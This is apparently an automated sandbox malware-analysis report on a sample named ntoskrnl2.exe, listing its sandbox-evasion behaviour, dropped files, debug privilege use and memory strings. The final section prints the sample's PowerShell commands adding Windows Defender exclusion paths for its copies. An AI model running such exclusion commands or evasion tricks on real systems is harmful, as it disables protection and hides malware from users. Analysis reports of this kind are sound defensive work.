                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Uses ping.exe to sleep
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeMemory allocated: A20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeMemory allocated: 1A720000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeMemory allocated: 7A0000 memory reserve | memory write watch
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeMemory allocated: 1A1A0000 memory reserve | memory write watch
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeMemory allocated: 2B90000 memory reserve | memory write watch
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeMemory allocated: 1AD50000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeMemory allocated: CB0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeMemory allocated: 1A840000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeMemory allocated: 960000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeMemory allocated: 1A400000 memory reserve | memory write watch
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeMemory allocated: 15E0000 memory reserve | memory write watch
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeMemory allocated: 1B0D0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3331Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4418Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3308Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3279
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3700
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3447
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeDropped PE file which has not been started: C:\Users\user\Desktop\olnMZMXE.logJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeDropped PE file which has not been started: C:\Users\user\Desktop\fscFeKAz.logJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeDropped PE file which has not been started: C:\Users\user\Desktop\dxIWpAcW.logJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeDropped PE file which has not been started: C:\Users\user\Desktop\clfwIsGE.logJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeDropped PE file which has not been started: C:\Users\user\Desktop\NgAzKpfk.logJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeDropped PE file which has not been started: C:\Users\user\Desktop\NewzHbtF.logJump to dropped file
                    Source: C:\Users\user\Desktop\ntoskrnl2.exe TID: 768Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212Thread sleep count: 3331 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep count: 4418 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7216Thread sleep count: 3308 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7304Thread sleep count: 3279 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336Thread sleep count: 3700 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7340Thread sleep count: 3447 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Containers\GFIYCbjKVID.exe TID: 7740Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Containers\GFIYCbjKVID.exe TID: 7956Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\ntoskrnl2.exe TID: 7984Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\Desktop\ntoskrnl2.exe TID: 7948Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\ntoskrnl2.exe TID: 7844Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe TID: 8060Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: ntoskrnl2.exe, 00000025.00000002.2169448732.0000000012CCA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                    Source: ntoskrnl2.exe, 00000025.00000002.2170774082.000000001B2C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeProcess token adjusted: Debug
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess token adjusted: Debug
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe'
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GFIYCbjKVID.exe'
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\PLA\Templates\GFIYCbjKVID.exe'
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Migration\WTR\GFIYCbjKVID.exe'
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Containers\GFIYCbjKVID.exe'
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ntoskrnl2.exe'
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GFIYCbjKVID.exe'Jump to behavior
